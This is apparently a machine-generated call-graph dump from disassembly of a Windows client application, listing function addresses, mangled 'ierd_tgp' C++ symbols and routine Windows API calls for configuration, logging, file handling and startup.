?get_qm_report_guid@common@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123 ?set_qm_report_guid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ 68028->68032 68035 6bd32955 68028->68035 68029->68028 68033 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68032->68033 68034 6bd83faa 68033->68034 68034->68028 68038 6bd32a23 68035->68038 68041 6bd329bb __EH_prolog3_GS 68038->68041 68040 6bd3296e 68040->68028 68042 6bd329f8 68041->68042 68045 6bdd35ae __EH_prolog3_catch_GS _Xtime_get_ticks 68042->68045 68043 6bd32a0e 68043->68040 68046 6bdd2789 68045->68046 68047 6bdd3602 ?get_log_instance@base@@YAPAVILogger@1 68046->68047 68049 6bdd362a 68047->68049 68048 6bdd3c05 __Init_thread_footer 68050 6bdd3693 68048->68050 68049->68048 68049->68050 68066 6bdd2eca __EH_prolog3_GS 68050->68066 68052 6bdd3725 ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ 68063 6bdd36e3 68052->68063 68053 6bdd3b07 ?get_log_instance@base@@YAPAVILogger@1 68054 6bdd3a16 68053->68054 68054->68053 68055 6bdd3b69 DeleteFileW 68054->68055 68056 6bdd3bbb 68054->68056 68057 6bdd3b21 68054->68057 68055->68057 68056->68043 68057->68054 68057->68055 68057->68056 68058 6bdd383c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@ 68059 6bdd390a DeleteFileW 68058->68059 68058->68063 68061 6bdd391d ?get_log_instance@base@@YAPAVILogger@1 68059->68061 68062 6bdd3995 ?get_log_instance@base@@YAPAVILogger@1 68059->68062 68065 6bdd3924 68061->68065 68062->68065 68063->68052 68063->68054 68063->68058 68074 6bdd435f 68063->68074 68064 6bdd3959 GetLastError 68064->68065 68065->68063 68065->68064 68067 6be22dcc std::_Facet_Register 4 API calls 68066->68067 68068 6bdd2ef1 68067->68068 68078 6bdd2be3 __EH_prolog3_catch 68068->68078 68070 6bdd2f10 ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ 68071 6bdd2f28 68070->68071 68072 6bdd2f3a _Open_dir 68071->68072 68073 6bdd2f64 68072->68073 68073->68063 68075 6bdd437c _Read_dir 68074->68075 68076 6bdd43ac 68074->68076 68075->68076 68077 6bdd439c _Close_dir 68075->68077 68076->68063 68077->68076 68079 6be22dcc std::_Facet_Register 4 API calls 68078->68079 68080 6bdd2bfc 68079->68080 68080->68070 68081 6bdbbdd8 RegOpenKeyExA 68082 6bdbbe13 memset RegQueryValueExA RegCloseKey 68081->68082 68083 6bdbbe71 68081->68083 68082->68083 68083->68083 68084 6be24367 68086 6be24373 68084->68086 68085 6be2437c 68086->68085 68087 6be243f1 ___scrt_fastfail 68086->68087 68088 6be2439b 68086->68088 68090 6be243f9 68087->68090 68089 6be243a5 __RTC_Initialize 68088->68089 68091 6be243e2 68089->68091 68092 6be2442e dllmain_raw 68090->68092 68094 6be24429 68090->68094 68102 6be24414 68090->68102 68093 6be243bd ___scrt_uninitialize_crt 68091->68093 68095 6be24448 dllmain_crt_dispatch 68092->68095 68092->68102 68093->68085 68096 6be2445f _DllMain 68094->68096 68095->68096 68095->68102 68097 6be24473 68096->68097 68098 6be24495 68096->68098 68097->68098 68099 6be24477 _DllMain dllmain_crt_dispatch dllmain_raw 68097->68099 68100 6be2449e dllmain_crt_dispatch 68098->68100 68098->68102 68099->68098 68101 6be244b1 dllmain_raw 68100->68101 68100->68102 68101->68102 68103 6bf703f0 ioctlsocket 68104 6bd572d2 GetCurrentThreadId 68105 6bd57a7a __EH_prolog3_catch_GS 68104->68105 68106 6bd19a0e 68105->68106 68107 6bd57ab0 ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@ 68106->68107 68108 6bd1cef4 68107->68108 68109 6bd57af2 ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@ 68108->68109 68110 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68109->68110 68111 6bd57b36 68110->68111 68121 6bd474ad __EH_prolog3_GS 68111->68121 68113 6bd57ba5 68114 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68113->68114 68120 6bd57bc1 68114->68120 68115 6bd58325 68116 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68115->68116 68117 6bd58331 68116->68117 68118 6bd474ad 5 API calls 68118->68120 68119 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68119->68120 68120->68115 68120->68118 68120->68119 68122 6bd474c7 68121->68122 68123 6bd474dc 68122->68123 68126 6bd474f2 68122->68126 68124 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68123->68124 68125 6bd474e8 68124->68125 68125->68113 68129 6bd442d7 __EH_prolog3 68126->68129 68130 6bd442ee 68129->68130 68133 6bd44233 __EH_prolog3 68130->68133 68134 6bd4424b 68133->68134 68135 6bd44259 _CxxThrowException 68134->68135 68136 6bd23e55 68139 6bd23d1c ?CreateWndImpl@WndMsgReceiver@Tenio@@IAEPAUHWND__@@PBDP6GJPAU3@IIJ@Z 68136->68139 68137 6bd23e63 68139->68137 68140 6bd47553 __EH_prolog3_catch_GS 68141 6bd19a0e 68140->68141 68142 6bd4757e ?root_full_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3 68141->68142 68143 6bd0a8f0 68142->68143 68144 6bd475b7 ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@ 68143->68144 68145 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68144->68145 68146 6bd475e3 68145->68146 68147 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68146->68147 68162 6bd475fa 68146->68162 68148 6bd47651 68147->68148 68149 6bd47696 ?u8_to_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVpath@filesystem@2@ 68148->68149 68152 6bd47728 68148->68152 68150 6bd476a9 68149->68150 68151 6bd476ca ?cfg_folder@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3 ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0 68149->68151 68153 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68150->68153 68157 6bd476fb 68151->68157 68154 6bd47765 ?u8_to_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVpath@filesystem@2@ 68152->68154 68153->68162 68155 6bd477a3 ?get_log_instance@base@@YAPAVILogger@1 68154->68155 68156 6bd4784f ?get_sh_folder@Sys_wrapper@common@ierd_tgp@@SA?AVpath@filesystem@3@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ 68154->68156 68159 6bd477aa 68155->68159 68165 6bd4787d 68156->68165 68160 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68157->68160 68158 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68161 6bd4781c 68158->68161 68159->68158 68160->68162 68163 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68161->68163 68164 6bd4782b 68163->68164 68167 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68164->68167 68166 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68165->68166 68169 6bd478d2 68166->68169 68168 6bd47847 68167->68168 68168->68156 68170 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68169->68170 68170->68157 68171 6bdbda53 __EH_prolog3_GS memset GetVersionExW 68172 6bdbdabc 68171->68172 68173 6bdbdaec 68172->68173 68176 6bdbdb95 68172->68176 68183 6bdbdad1 68172->68183 68174 6bdbdb06 _wcsnicmp 68173->68174 68173->68183 68177 6bdbdb2f _wcsnicmp 68174->68177 68174->68183 68175 6bdbdc6f ?Is64Bit_OS@Sys_wrapper@common@ierd_tgp@ 68178 6bdbdc8b 68175->68178 68180 6bd2a76f 27 API calls 68176->68180 68176->68183 68179 6bdbdb52 _wcsnicmp 68177->68179 68177->68183 68179->68183 68181 6bdbdc1a 68180->68181 68182 6bd0a3a0 _invalid_parameter_noinfo_noreturn 68181->68182 68182->68183 68183->68175 68184 6bda8c50 OpenFileMappingW 68185 6bda8c68 MapViewOfFile 68184->68185 68186 6bda8c66 68184->68186 68187 46f3c8 68188 46f3d4 ___scrt_is_nonwritable_in_current_image 68187->68188 68209 46e5ca 68188->68209 68190 46f3db 68191 46f534 68190->68191 68194 46f405 68190->68194 68486 46f8ab 6 API calls ___scrt_fastfail 68191->68486 68193 46f53b exit 68195 46f541 _exit 68193->68195 68196 46f409 _initterm_e 68194->68196 68200 46f452 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 68194->68200 68197 46f424 68196->68197 68198 46f435 _initterm 68196->68198 68198->68200 68199 46f4a6 __p___argv __p___argc _get_initial_narrow_environment 68213 46ca3b 68199->68213 68200->68199 68203 46f49e _register_thread_local_exe_atexit_callback 68200->68203 68203->68199 68210 46e5d3 68209->68210 68487 46f704 IsProcessorFeaturePresent 68210->68487 68212 46e5df pre_c_initialization 68212->68190 68488 46e4e4 68213->68488 68215 46ca4a GetCommandLineW 68489 40bcb0 68215->68489 68217 46ca6e 68218 46cac7 MessageBoxA 68217->68218 68219 46ca89 68217->68219 68221 46cad6 68218->68221 68697 40bf40 68219->68697 68223 46caf3 ?stamp_point@@YAXPBD ?get_log_instance@base@@YAPAVILogger@1 68221->68223 68224 46cadb strcmp 68221->68224 68226 46cb59 68223->68226 68239 46cb09 68223->68239 68224->68223 68225 46caee ?stamp_init@ 68224->68225 68225->68223 68229 46cca0 ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD OutputDebugStringA 68226->68229 68230 46cb6a ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ 68226->68230 68228 46cab9 68232 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 68228->68232 68514 461f63 68229->68514 68493 440ea2 68230->68493 68235 46cac5 68232->68235 68235->68221 68239->68226 68702 43dcb8 memmove 68239->68702 68241 46cbd4 ?get_client_id@util_client_info@ierd_tgp@ 68246 46cbf0 68241->68246 68247 46cbe1 68241->68247 68254 46cc83 68246->68254 68260 420e50 8 API calls 68246->68260 68253 420e50 8 API calls 68247->68253 68253->68246 68263 420c80 ~refcount_ptr _invalid_parameter_noinfo_noreturn 68254->68263 68257 46cb4b 68703 43e231 _invalid_parameter_noinfo_noreturn 68257->68703 68266 46cc2d ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAV45@ 68260->68266 68269 46cc8f 68263->68269 68272 420c80 ~refcount_ptr _invalid_parameter_noinfo_noreturn 68266->68272 68275 420c80 ~refcount_ptr _invalid_parameter_noinfo_noreturn 68269->68275 68280 46cc4c ?get_process_count@util_multi_instance@ierd_tgp@@YAHPBD 68272->68280 68277 46cc9a 68275->68277 68277->68229 68289 46cc77 68280->68289 68290 46cc63 ?set_same_client_type_multi_instance@util_multi_instance@ierd_tgp@@YAX_N ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123 ?SetIsMultiInstance@Qos@qos@adapt_for_imports@ierd_tgp@@QAEX_N 68280->68290 68300 420c80 ~refcount_ptr _invalid_parameter_noinfo_noreturn 68289->68300 68290->68289 68300->68254 68486->68193 68487->68212 68488->68215 68490 40bcd2 68489->68490 68490->68490 68742 40bf70 68490->68742 68492 40bcea 68492->68217 68496 440eb2 68493->68496 68497 440ec1 68493->68497 68494 440f01 memchr 68495 440ee5 memcmp 68494->68495 68494->68497 68495->68496 68495->68497 68496->68494 68496->68497 68498 420e50 68497->68498 68499 420e66 memmove 68498->68499 68504 420e8e 68498->68504 68499->68241 68501 420f6e 68767 40cf50 ?_Xlength_error@std@@YAXPBD 68501->68767 68504->68501 68505 420ed7 68504->68505 68506 420efc 68504->68506 68507 46e3bc std::_Facet_Register 4 API calls 68505->68507 68508 420ee8 68506->68508 68509 46e3bc std::_Facet_Register 4 API calls 68506->68509 68507->68508 68510 420f0d memmove 68508->68510 68511 420f68 _invalid_parameter_noinfo_noreturn 68508->68511 68509->68508 68512 420f4f _Ref_count_obj 68510->68512 68513 420f32 68510->68513 68511->68501 68512->68241 68513->68511 68513->68512 68768 46e476 68514->68768 68516 461f72 GetCommandLineW 68517 40bcb0 8 API calls 68516->68517 68518 461f86 ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ ?get_log_instance@base@@YAPAVILogger@1 68517->68518 68519 462009 GetCommandLineW CommandLineToArgvW 68518->68519 68529 461fc1 68518->68529 68520 462026 ?get_log_instance@base@@YAPAVILogger@1 68519->68520 68521 462075 68519->68521 68522 46210d 68520->68522 68533 462035 68520->68533 68523 46207f wcscmp 68521->68523 68524 4620b8 ?get_log_instance@base@@YAPAVILogger@1 68521->68524 68527 420c80 ~refcount_ptr _invalid_parameter_noinfo_noreturn 68522->68527 68525 462176 ?get_log_instance@base@@YAPAVILogger@1 68523->68525 68526 462097 wcscmp 68523->68526 68524->68522 68524->68533 68525->68522 68538 46213d 68525->68538 68526->68521 68528 462132 ?get_log_instance@base@@YAPAVILogger@1 68526->68528 68530 46211b 68527->68530 68528->68522 68528->68538 68529->68519 68772 453673 91 API calls 68529->68772 68531 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 68530->68531 68534 46212a 68531->68534 68533->68522 68774 43dcb8 memmove 68533->68774 68769 46e420 68534->68769 68535 461ffe 68773 43e231 _invalid_parameter_noinfo_noreturn 68535->68773 68538->68522 68776 43dcb8 memmove 68538->68776 68541 462102 68775 43e231 _invalid_parameter_noinfo_noreturn 68541->68775 68544 4621c4 68777 43e231 _invalid_parameter_noinfo_noreturn 68544->68777 68698 40bf50 68697->68698 68698->68698 68699 40bf70 SimpleUString::operator= 8 API calls 68698->68699 68700 40bf68 68699->68700 68701 45d5ea 38 API calls 3 library calls 68700->68701 68701->68228 68702->68257 68703->68226 68743 40bf86 memmove 68742->68743 68748 40bfb3 68742->68748 68743->68492 68745 40c0a7 68766 40cf50 ?_Xlength_error@std@@YAXPBD 68745->68766 68748->68745 68749 40bffd 68748->68749 68750 40c02d 68748->68750 68751 46e3bc std::_Facet_Register 4 API calls 68749->68751 68752 40c01b 68750->68752 68758 46e3bc 68750->68758 68751->68752 68754 40c040 memmove 68752->68754 68755 40c0a1 _invalid_parameter_noinfo_noreturn 68752->68755 68756 40c067 68754->68756 68757 40c088 _Ref_count_obj 68754->68757 68755->68745 68756->68755 68756->68757 68757->68492 68759 46e3ce malloc 68758->68759 68760 46e3c1 _callnewh 68759->68760 68761 46e3db 68759->68761 68760->68759 68763 46e3dd std::_Facet_Register 68760->68763 68761->68752 68762 46f6e7 std::_Facet_Register 68764 46f6f5 _CxxThrowException 68762->68764 68763->68762 68765 46f6d8 _CxxThrowException 68763->68765 68765->68762 68768->68516 68778 46e3fa 68769->68778 68771 46e42b 68771->68771 68772->68535 68773->68519 68774->68541 68775->68522 68776->68544 68777->68522 68779 46e405 IsProcessorFeaturePresent 68778->68779 68780 46e403 68778->68780 68782 46e9fe 68779->68782 68780->68771 68785 46e9c2 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 68782->68785 68784 46eae1 68784->68771 68785->68784 70582 6bd4885b __EH_prolog3_GS ?get_cfg_module_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3 70583 6bd48899 70582->70583 70584 6bd488a8 ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0 70583->70584 70585 6bd48913 ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@ 70584->70585 70586 6bd488c1 ?has_parent_path@path@filesystem@ierd_tgp@ 70585->70586 70587 6bd4892e ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@ 70585->70587 70588 6bd488d1 ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123 70586->70588 70589 6bd48969 70586->70589 70593 6bd4894b 70587->70593 70590 6bd488ea 70588->70590 70591 6bd48975 ?get_cfg_module_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3 ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0 ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ 70589->70591 70592 6bd48902 ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0 70590->70592 70591->70593 70592->70585 70594 6bd952cf __EH_prolog3_GS 70595 6bd952e8 ?get_log_instance@base@@YAPAVILogger@1 70594->70595 70598 6bd9534c 70594->70598 70596 6bd952f3 70595->70596 70624 6bd95333 70595->70624 70597 6bd1e945 17 API calls 70596->70597 70596->70624 70597->70624 70599 6bd953d7 ?get_log_instance@base@@YAPAVILogger@1 70598->70599 70600 6bd9542a 70598->70600 70598->70624 70604 6bd95540 70599->70604 70615 6bd953e6 70599->70615 70601 6bd95abf 64 API calls 70600->70601 70613 6bd954b5 70600->70613 70602 6bd95465 ?get_log_instance@base@@YAPAVILogger@1 70601->70602 70607 6bd95476 70602->70607 70602->70613 70603 6bd1e945 17 API calls 70603->70604 70608 6bd96485 73 API calls 70604->70608 70609 6bd956b8 70604->70609 70621 6bd9562d 70604->70621 70606 6bd954f0 ?get_log_instance@base@@YAPAVILogger@1 70606->70604 70606->70615 70611 6bd1e945 17 API calls 70607->70611 70607->70613 70610 6bd955dd ?get_log_instance@base@@YAPAVILogger@1 70608->70610 70609->70624 70652 6bd96485 __EH_prolog3_GS 70609->70652 70618 6bd955ee 70610->70618 70610->70621 70611->70613 70613->70604 70626 6bd95abf __EH_prolog3_GS 70613->70626 70614 6bd95745 ?get_log_instance@base@@YAPAVILogger@1 70620 6bd95753 70614->70620 70614->70624 70615->70603 70615->70604 70616 6bd96485 73 API calls 70617 6bd95668 ?get_log_instance@base@@YAPAVILogger@1 70616->70617 70617->70609 70623 6bd95679 70617->70623 70619 6bd1e945 17 API calls 70618->70619 70618->70621 70619->70621 70622 6bd1e945 17 API calls 70620->70622 70620->70624 70621->70609 70621->70616 70622->70624 70623->70609 70625 6bd1e945 17 API calls 70623->70625 70625->70609 70627 6bd95ada 70626->70627 70631 6bd95aed 70626->70631 70680 6bd926a1 __EH_prolog3_GS memset memset memset memset 70627->70680 70629 6bd95adf 70630 6bd95c6b ?get_log_instance@base@@YAPAVILogger@1 70629->70630 70629->70631 70632 6bd95cc8 Concurrency::details::platform::__RegisterWaitForSingleObject 70630->70632 70635 6bd95c78 70630->70635 70633 6bd95b1f ?get_log_instance@base@@YAPAVILogger@1 70631->70633 70636 6bd95b96 70631->70636 70634 6bd95cdc 70632->70634 70633->70636 70644 6bd95b2d 70633->70644 70634->70606 70635->70632 70639 6bd1e945 17 API calls 70635->70639 70637 6bd95c4c 70636->70637 70638 6bd95bc7 ?get_log_instance@base@@YAPAVILogger@1 70636->70638 70643 6bd95c5b ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 70637->70643 70640 6bd95c1e Concurrency::details::platform::__RegisterWaitForSingleObject 70638->70640 70647 6bd95bd2 70638->70647 70641 6bd95cb9 70639->70641 70642 6bd261b6 70640->70642 70641->70632 70645 6bd95c3b ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 70642->70645 70643->70634 70644->70636 70646 6bd1e945 17 API calls 70644->70646 70645->70634 70648 6bd95b87 70646->70648 70647->70640 70650 6bd1e945 17 API calls 70647->70650 70649 6bd0a3a0 _invalid_parameter_noinfo_noreturn 70648->70649 70649->70636 70651 6bd95c10 70650->70651 70651->70640 70653 6bd964a0 70652->70653 70657 6bd964b3 70652->70657 70654 6bd926a1 55 API calls 70653->70654 70655 6bd964a5 70654->70655 70656 6bd9661a ?get_log_instance@base@@YAPAVILogger@1 70655->70656 70655->70657 70658 6bd96671 Concurrency::details::platform::__RegisterWaitForSingleObject 70656->70658 70662 6bd96625 70656->70662 70659 6bd964e1 ?get_log_instance@base@@YAPAVILogger@1 70657->70659 70679 6bd96553 70657->70679 70663 6bd96686 70658->70663 70672 6bd964ec 70659->70672 70659->70679 70660 6bd9afd1 36 API calls 70661 6bd96570 70660->70661 70664 6bd96578 ?get_log_instance@base@@YAPAVILogger@1 70661->70664 70665 6bd965fb 70661->70665 70662->70658 70667 6bd1e945 17 API calls 70662->70667 70663->70614 70666 6bd965cc Concurrency::details::platform::__RegisterWaitForSingleObject 70664->70666 70671 6bd96583 70664->70671 70669 6bd9660a ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 70665->70669 70668 6bd261b6 70666->70668 70673 6bd96662 70667->70673 70670 6bd965ea ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 70668->70670 70669->70663 70670->70663 70671->70666 70674 6bd1e945 17 API calls 70671->70674 70675 6bd1e945 17 API calls 70672->70675 70672->70679 70673->70658 70676 6bd965bd 70674->70676 70677 6bd96544 70675->70677 70676->70666 70678 6bd0a3a0 _invalid_parameter_noinfo_noreturn 70677->70678 70678->70679 70679->70660 70681 6bd92709 70680->70681 70682 6bd92811 memset 70681->70682 70694 6bd02b50 calloc 70682->70694 70684 6bd9284b 70685 6bd92875 70684->70685 70686 6bd02b50 9 API calls 70684->70686 70687 6bd92889 ?get_log_instance@base@@YAPAVILogger@1 70685->70687 70688 6bd928e4 ?get_log_instance@base@@YAPAVILogger@1 70685->70688 70686->70685 70693 6bd92898 70687->70693 70688->70693 70690 6bd92947 70722 6bd96690 __EH_prolog3_GS 70690->70722 70692 6bd9294e 70692->70629 70708 6bd94b02 __EH_prolog3_GS memset memset GetModuleFileNameW 70693->70708 70695 6bd02b94 _time32 srand rand 70694->70695 70696 6bd02b6f __snprintf_s 70694->70696 70727 6bf700d0 WSAStartup 70695->70727 70696->70684 70698 6bd02bba 70699 6bd02bc7 __snprintf_s 70698->70699 70701 6bd02bf6 70698->70701 70700 6bd02beb 70699->70700 70700->70684 70702 6bd02c1e __snprintf_s 70701->70702 70706 6bd02c4d 70701->70706 70703 6bd02c42 70702->70703 70703->70684 70704 6bd02c6c __snprintf_s 70705 6bd02c8b 70704->70705 70705->70684 70706->70704 70707 6bd02c96 70706->70707 70707->70684 70709 6bd94b79 wcsrchr 70708->70709 70710 6bd94c73 70708->70710 70712 6bd94b8d wcsrchr 70709->70712 70713 6bd94ba1 70709->70713 70711 6bd0a3a0 _invalid_parameter_noinfo_noreturn 70710->70711 70714 6bd94c82 70711->70714 70712->70713 70715 6bd94ba6 __snprintf_s 70712->70715 70713->70715 70714->70690 70716 6bd1d420 70715->70716 70717 6bd94bff ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@ 70716->70717 70718 6bd1d276 70717->70718 70719 6bd94c26 ?file_get_version@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAUversion_t@12@ ?to_string@version_t@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 70718->70719 70720 6bd94c65 70719->70720 70721 6bd0a3a0 _invalid_parameter_noinfo_noreturn 70720->70721 70721->70710 70723 6bd2a76f 27 API calls 70722->70723 70724 6bd966b1 70723->70724 70725 6bd0a3a0 _invalid_parameter_noinfo_noreturn 70724->70725 70726 6bd96746 70725->70726 70726->70692 70728 6bf70117 70727->70728 70728->70698 70729 6be64af0 WaitForSingleObject FindCloseChangeNotification 70730 6bd23d44 memset 70731 6bd23d82 strcpy_s 70730->70731 70733 6bd23d94 70730->70733 70732 6bd23da8 CreateWindowExA 70731->70732 70734 6bd23dd1 SetLastError SetWindowLongA 70732->70734 70735 6bd23e2d 70732->70735 70733->70732 70736 6bd23df0 GetLastError 70734->70736 70737 6bd23df6 SetLastError SetWindowLongA 70734->70737 70736->70737 70738 6bd23e12 DestroyWindow 70736->70738 70739 6bd23e0c GetLastError 70737->70739 70740 6bd23e1d ShowWindow UpdateWindow 70737->70740 70738->70735 70739->70738 70739->70740 70740->70735 70741 6bd61bce 70744 6bd63dd1 __EH_prolog3_GS 70741->70744 70743 6bd61be2 70745 6bd63df3 GetFileAttributesW 70744->70745 70746 6bd63df1 70744->70746 70747 6bd63e14 70745->70747 70750 6bd63e01 70745->70750 70746->70745 70748 6bd63e28 70747->70748 70747->70750 70749 6bd63e33 CreateFileW 70748->70749 70752 6bd63e69 70749->70752 70750->70743 70751 6bd63e6f 70751->70750 70752->70751 70753 6bd63e8e 70752->70753 70754 6bd63eaf CloseHandle 70752->70754 70755 6bd63e95 CloseHandle 70753->70755 70754->70750 70755->70750 70757 6bd94f45 70760 6bd95262 __EH_prolog3 70757->70760 70759 6bd94f4e ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@ 70761 6bd9528f 70760->70761 70762 6bd95297 70760->70762 70761->70759 70762->70761 70763 6bd952ac ??0Qos@qos@adapt_for_imports@ierd_tgp@@QAE 70762->70763 70764 6be239d0 70763->70764 70765 6bd952c1 __Init_thread_footer 70764->70765 70765->70761 70766 6bd46fc9 ?get_cfg@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABVpath@filesystem@2@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N3 70767 6bdb2a44 __EH_prolog3_GS memset memset SHGetFolderPathW 70768 6bd1d420 70767->70768 70769 6bdb2acb ?get_client_version_type@overseas@ierd_tgp@ 70768->70769 70770 6bdb2ae0 ?get_client_version_type@overseas@ierd_tgp@ 70769->70770 70771 6bdb2ad9 70769->70771 70770->70771 70772 6bdb2bb1 ?get_log_instance@base@@YAPAVILogger@1 70771->70772 70773 6bdb2b01 swprintf 70771->70773 70774 6bdb2bbc 70772->70774 70779 6bdb2b83 70772->70779 70775 6bdb2b43 70773->70775 70774->70779 70780 6bd1e945 17 API calls 70774->70780 70776 6bdb2b53 ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@ 70775->70776 70777 6bdb2b72 ?create_directory_ex@Sys_wrapper@common@ierd_tgp@@SA_NABVpath@filesystem@3@ 70776->70777 70776->70779 70778 6bdb2ba2 70777->70778 70777->70779 70778->70772 70780->70779 70781 451665 70784 4519d5 70781->70784 70783 451677 70785 4519e1 __EH_prolog3 70784->70785 70786 40d190 6 API calls 70785->70786 70787 451a04 70786->70787 70790 45e615 70787->70790 70788 451a10 ~refcount_ptr 70788->70783 70791 45e624 __EH_prolog3_catch_GS 70790->70791 70792 40bf40 SimpleUString::operator= 8 API calls 70791->70792 70793 45e671 70792->70793 70794 40bf40 SimpleUString::operator= 8 API calls 70793->70794 70795 45e69d 70794->70795 70796 40bf40 SimpleUString::operator= 8 API calls 70795->70796 70797 45e6c0 70796->70797 70798 40bf40 SimpleUString::operator= 8 API calls 70797->70798 70799 45e6e3 70798->70799 70838 4599e1 70799->70838 70801 45e704 70844 458a52 70801->70844 70803 45e72c 70849 450f32 70803->70849 70808 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 70826 45e75f 70808->70826 70809 45e985 70899 45b475 _invalid_parameter_noinfo_noreturn Mailbox 70809->70899 70810 43df6d 6 API calls 70810->70826 70812 45e994 70900 45b475 _invalid_parameter_noinfo_noreturn Mailbox 70812->70900 70815 45e9a3 70901 45bf18 _invalid_parameter_noinfo_noreturn _invalid_parameter_noinfo_noreturn ~refcount_ptr 70815->70901 70816 40bba0 8 API calls 70816->70826 70818 45e9b9 70819 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 70818->70819 70820 45e9c5 70819->70820 70821 40bbd0 Mailbox _invalid_parameter_noinfo_noreturn 70820->70821 70822 45e9d1 70821->70822 70823 46e431 5 API calls 70822->70823 70825 45e9d6 70823->70825 70824 40bbd0 _invalid_parameter_noinfo_noreturn Mailbox 70824->70826 70825->70788 70826->70809 70826->70810 70826->70816 70826->70824 70828 45e7e2 DeleteFileW 70826->70828 70873 4694ee 70826->70873 70889 467400 70826->70889 70829 45e8b6 ?get_log_instance@base@@YAPAVILogger@1 70828->70829 70830 45e7fc 